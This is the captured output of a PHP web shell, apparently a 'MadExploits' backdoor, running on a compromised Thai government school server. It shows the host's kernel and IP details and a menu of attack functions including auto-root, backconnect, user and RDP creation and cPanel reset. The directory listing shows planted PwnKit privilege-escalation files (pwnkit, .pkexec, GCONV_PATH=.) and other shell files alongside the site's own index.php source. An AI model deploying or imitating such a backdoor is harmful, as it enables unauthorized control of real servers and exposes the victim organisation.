Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
FusionCharts
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
ajax
[ DIR ]
drwxr-xr-x
alert
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
blocks
[ DIR ]
drwxr-xr-x
bootstrap-3.3.5-dist
[ DIR ]
drwxr-xr-x
bootstrap-4.3.1-dist
[ DIR ]
drwxr-xr-x
chart
[ DIR ]
drwxr-xr-x
ckeditor
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
datepicker_thaiyear
[ DIR ]
drwxr-xr-x
export
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
jquery
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
rss
[ DIR ]
drwxr-xr-x
signature
[ DIR ]
drwxr-xr-x
smss
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
update
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
aminfo.php
19
B
-rwxr-xr-x
amss_smss_book.pdf
6.75
MB
-rw-r--r--
amssplus_connect.php
410
B
-rwxr-xr-x
banner_manaul.png
1.57
MB
-rw-r--r--
change_os.php
124
B
-rwxr-xr-x
favicon.ico
555
B
-rw-r--r--
index.php
2.47
KB
-rw-r--r--
index0.html
4.67
KB
-rwxr-xr-x
index_blocks.php
4.09
KB
-rw-r--r--
index_desktop.php
5.26
KB
-rwxr-xr-x
index_desktop11.php
3.45
KB
-rwxr-xr-x
index_mobile.php
3.35
KB
-rwxr-xr-x
index_mobile.php.save
3.35
KB
-rw-------
index_mobile11.php
1.9
KB
-rwxr-xr-x
login.php
4.04
KB
-rw-r--r--
login_.php
3.89
KB
-rwxr-xr-x
login_2.php
8.46
KB
-rw-r--r--
logout.php
129
B
-rwxr-xr-x
logout2.php
65
B
-rwxr-xr-x
main_js.js
1.63
KB
-rwxr-xr-x
mainfile.php
902
B
-rwxr-xr-x
menu.php
4.53
KB
-rwxr-xr-x
menu_mobile.php
3.12
KB
-rwxr-xr-x
php_errors.log
165.81
MB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
smss_index.php
160
B
-rwxr-xr-x
ss.php
7.07
KB
-rwxr-xr-x
version.php
31
B
-rw-r--r--
zoomit.zip
294.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php session_start(); /** Set flag that this is a parent file */ define( "_VALID_", 1 ); require_once "amssplus_connect.php"; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AMSS++</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php if(isset($_SESSION['user_os'])){ if($_SESSION['user_os']=='mobile'){ echo "<meta name = 'viewport' content = 'width = device-width'>"; } } if(isset($_POST['user_os'])){ if($_POST['user_os']=='mobile'){ echo "<meta name = 'viewport' content = 'width = device-width'>"; } } ?> <!-- Beginning of compulsory code below --> <link href="css/dropdown/dropdown.css" media="all" rel="stylesheet" type="text/css" /> <link href="css/dropdown/themes/adobe.com/default.advanced.css" media="all" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="main_js.js"></script> <!-- Bootstrap Include --> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous"> <link rel="stylesheet" href="css/mm_training.css" type="text/css" /> </head> <body> <?php if(isset($_POST['login_submit'])){ require_once "include/login_chk.php"; } if(!(isset($_SESSION['AMSSPLUS']))){ require_once('login.php'); exit(); } if((!(isset($_SESSION['login_user_id']))) and (!(isset($_POST['system_multi_school'])))){ require_once('login.php'); exit(); } if(isset($system_office_code)){ if($_SESSION['office_code']!=$system_office_code){ require_once('login.php'); exit(); } } require_once("mainfile.php"); $PHP_SELF = "index.php"; if(!(isset($_REQUEST['option']))){ $_REQUEST['option']=""; } if(!(isset($_GET['option']))){ $_GET['option']=""; } if(!(isset($_REQUEST['file']))){ $_REQUEST['file']=""; } if(isset($_REQUEST['index'])){ $index=$_REQUEST['index']; } else{ $index=""; } GETMODULE($_REQUEST['option'],$_REQUEST['file']); if($_SESSION['user_os']=='mobile'){ if(isset($_SESSION['smss_mode'])){ require_once "index_desktop.php"; } else{ require_once "index_mobile.php"; } } else{ require_once "index_desktop.php"; } mysqli_close($connect); ?> <noscript> !Warning! Javascript must be enabled for proper operation of the Administrator </noscript> <br /> </body> </html>
Close